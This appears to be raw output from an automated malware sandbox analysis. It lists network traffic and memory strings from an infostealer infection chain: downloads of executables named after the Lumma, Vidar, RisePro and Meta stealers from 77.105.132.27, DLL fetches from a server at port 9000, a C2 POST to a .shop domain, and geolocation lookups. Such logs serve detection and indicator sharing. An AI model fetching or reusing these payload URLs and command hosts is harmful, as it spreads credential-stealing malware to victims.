Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27
Source: unknown	TCP traffic detected without corresponding DNS query: 77.105.132.27

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 20_2_00409280 recv,GetProcAddress,GetModuleHandleA,GetProcAddress,WSASend,

20_2_00409280

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /g067n HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /widget/demo/8.46.123.33 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic	HTTP traffic detected: GET /rise2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vidar2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /lumma2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /meta2806.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36Host: 77.105.132.27Cache-Control: no-cache

Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.000000000331D000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.000000000291D000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $^q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.000000000331D000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.000000000291D000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.000000000331D000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.000000000291D000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\^q equals www.youtube.com (Youtube)
Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.000000000331D000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.000000000291D000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: `,^q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: db-ip.com
Source: global traffic	DNS traffic detected: DNS query: potterryisiw.shop
Source: global traffic	DNS traffic detected: DNS query: t.me

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: potterryisiw.shop

Source: RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1990992096.00000000057D0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1989820350.0000000001346000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.132.27/lumma2806.exe
Source: RegAsm.exe, 00000003.00000002.1990992096.00000000057D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.132.27/lumma2806.exeB
Source: RegAsm.exe, 00000003.00000002.1990992096.00000000057D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.132.27/meta2806.exe
Source: RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.132.27/meta2806.exe/risep
Source: RegAsm.exe, 00000003.00000002.1990992096.00000000057D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.132.27/meta2806.exeL
Source: RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1990536151.0000000005720000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.132.27/rise2806.exe
Source: RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.132.27/rise2806.exep0
Source: RegAsm.exe, 00000003.00000002.1990536151.0000000005720000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.132.27/rise2806.exes
Source: RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1990992096.00000000057D0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1989820350.0000000001353000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.132.27/vidar2806.exe
Source: RegAsm.exe, 00000003.00000002.1990992096.00000000057D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://77.105.132.27/vidar2806.exeX
Source: RegAsm.exe, 00000026.00000002.2004278407.0000000001398000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 00000003.00000002.1990168095.00000000015B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.exif/1e.$A/
Source: RegAsm.exe, 00000003.00000002.1990168095.00000000015B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.microsofo/1.2/
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: RegAsm.exe, 00000018.00000002.2955705176.00000000200CD000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2948532623.000000001A12A000.00000004.00000020.00020000.00000000.sdmp, sqlt[1].dll.24.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: zyJWi2vy29.exe, 00000000.00000002.1793391984.0000000000350000.00000004.00000001.01000000.00000003.sdmp, 6p7a7injLZJojhETBNhL.exe, 0000000A.00000002.1873810706.0000000000700000.00000004.00000001.01000000.00000006.sdmp, MSIUpdaterV168.exe, 0000000C.00000002.2022435197.0000000000150000.00000004.00000001.01000000.00000007.sdmp, MSIUpdaterV168.exe, 0000000E.00000002.1980283521.0000000000150000.00000004.00000001.01000000.00000007.sdmp, RegAsm.exe, RegAsm.exe, 00000014.00000002.1940536780.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1982292977.0000000006862000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214/
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000
Source: RegAsm.exe, 00000018.00000002.2942958827.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/)
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/70osoft
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/8(H
Source: RegAsm.exe, 00000018.00000002.2942958827.00000000014C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/=3%
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/Jb
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/Qb
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/freebl3.dll
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/freebl3.dllc
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/freebl3.dllge
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/gr
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/icrosoft
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/mozglue.dll
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/mozglue.dllge
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/msvcp140.dll
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/msvcp140.dll?
Source: RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/msvcp140.dllH
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/msvcp140.dlle
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/nss3.dll
Source: RegAsm.exe, 00000018.00000002.2942958827.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/nss3.dlls0
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/softokn3.dll
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/softokn3.dlle
Source: RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/softokn3.dllgM
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/softokn3.dllo
Source: RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/softokn3.dlls5
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/sqlt.dll
Source: RegAsm.exe, 00000018.00000002.2942958827.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/sqlt.dll67
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2939946030.0000000000539000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.000000000135F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2942958827.0000000001446000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/vcruntime140.dll
Source: RegAsm.exe, 00000018.00000002.2942958827.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/vcruntime140.dll.
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2939946030.0000000000539000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/vcruntime140.dller
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000539000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/vcruntime140.dllrv:129.0)
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/x$H
Source: RegAsm.exe, 00000018.00000002.2942958827.000000000137E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000/y
Source: RegAsm.exe, 00000018.00000002.2939946030.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000018.00000002.2939946030.0000000000539000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000170le
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000Microsoft
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000g
Source: RegAsm.exe, 00000018.00000002.2939946030.0000000000445000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://195.201.251.214:9000ontent-Disposition:
Source: 6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSIUpdaterV168.exe, 0000002E.00000002.2014079426.00000000032DC000.00000004.00000800.00020000.00000000.sdmp, 8jZLXI789L2zXDjlm7Fx.exe, 0000002F.00000002.1971057249.0000000002841000.00000004.00000800.00020000.00000000.sdmp, MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.s
Source: MSIUpdaterV168.exe, 00000037.00000002.2014227672.0000000002A0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: 6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 6JTEmGBjvBASWeb Data.3.dr, DE7o6D8KRQYZWeb Data.3.dr, hzBvBK8Qfe_SWeb Data.3.dr, CAAEBK.24.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000014.00000002.1941155556.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/
Source: RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/T
Source: RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33
Source: RegAsm.exe, 00000014.00000002.1941155556.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/v
Source: RegAsm.exe, 00000003.00000002.1989820350.00000000013AC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/x;
